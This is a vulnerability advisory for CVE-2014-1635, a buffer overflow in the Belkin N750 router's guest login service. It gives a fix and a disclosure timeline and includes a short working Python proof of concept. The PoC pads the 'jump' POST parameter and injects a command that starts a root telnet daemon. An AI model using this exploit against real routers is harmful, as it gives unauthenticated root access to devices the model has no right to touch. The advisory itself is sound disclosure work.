CVE-2014-1635 Belkin N750 Buffer Overflow

1. Vulnerability Properties

Title: Belkin n750 buffer overflow

CVE ID: CVE-2014-1635

CVSSv2 Base Score: 10 (AV:N/AC:L/AU:N/C:P/I:N/A:N)

Vendor: BELKIN (http://www.belkin.com/)

Products: n750/F9K1103

Advisory Release Date:  2014-11-04

Advisory URL:  https://labs.integrity.pt/advisories/CVE-2014-1635/

Credits: Discovery and PoC by Marco Vaz <mv[at]integrity.pt>

 

2. Vulnerability Summary

A remote unauthenticated attacker may execute commands as root by sending an unauthenticated crafted POST request to the httpd that serves authentication on the guest login network.

3. Technical Details

The vulnerability can be confirmed by sending a crafted POST request where the parameter “jump” takes 1379 bytes of padding concatenated with the commands to be executed and with content different from zero to overwrite an internal control variable.

The following POC code can be used to verify the vulnerability:

#!/usr/bin/python
#Title : Belkin n750 buffer overflow in jump login parameter
#Date : 28 Jan 2014
#Author : Discovered and developed by Marco Vaz <mv@integrity.pt>
#Testd on: Firmware: 1.10.16m (2012/9/14 6:6:56) / Hardware : F9K1103 v1 (01C)

import httplib

headers = {}
body= "GO=&jump="+ "a"*1379 +"%3b"+ "/usr/sbin/utelnetd -d" +"%3b&pws=\n\n"
conn = httplib.HTTPConnection("192.168.169.1",8080)
conn.request("POST", "/login.cgi", body, headers)
response = conn.getresponse()
data = response.read()
print data

4. Vulnerable Versions

Confirmed on Belkin n750 F9K1103_WW_1.10.16m.

5. Solution

Upgrade to Belkin n750 F9K1103_WW_1.10.17m.

6. Vulnerability Timeline

24 Jan 2014 – Reported to Vendor

28 Jan 2014 – Sent POC code

31 Mar 2014 – Vendor released new firmware version